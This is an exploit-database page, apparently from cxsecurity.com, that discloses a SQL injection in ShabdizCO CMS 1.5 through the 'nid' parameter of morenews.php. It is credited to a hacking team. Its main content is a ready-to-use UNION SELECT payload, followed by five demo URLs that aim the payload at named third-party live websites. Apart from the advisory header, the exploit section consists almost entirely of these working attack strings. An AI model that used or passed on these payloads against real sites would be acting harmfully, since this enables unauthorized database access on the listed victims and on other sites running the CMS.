ShabdizCO CMS SQL Injection

2016.05.02
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-89

###################### # Exploit Title : ShabdizCO CMS SQL Injection # Exploit Author : Persian Hack Team # Vendor Homepage : http://shabdiz.org/ # Date: 2016/05/02 # Category: [ Webapps ] # Tested on: [Win / php ] # Version : 1.5 ###################### # POC: # GET >> nid= SQLI # Demo: # http://www.clinicprestige.com/morenews.php?nid=-42944%20union%20select%20database%28%29,2,3,4,5,6%20-- # http://www.mafk.ir/morenews.php?nid=-67424%20%20union%20select%20database%28%29,2,3,4,5,6%20-- # http://heshmatian110.com/morenews.php?nid=-51798%20%20%20union%20select%20database%28%29,2,3,4,5,6%20-- # http://www.pouyasazangroup.ir/morenews.php?nid=-51798%20%20%20union%20select%20database%28%29,2,3,4,5,6%20-- # http://behinpayab.ir/morenews.php?nid=-51798%20%20%20union%20select%20database%28%29,2,3,4,5,6%20-- # ###################### # Discovered by : Mojtaba MobhaM (kazemimojtaba@live.com) # Greetz : T3NZOG4N & FireKernel And All Persian Hack Team Members # Homepage : persian-team.ir ######################


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top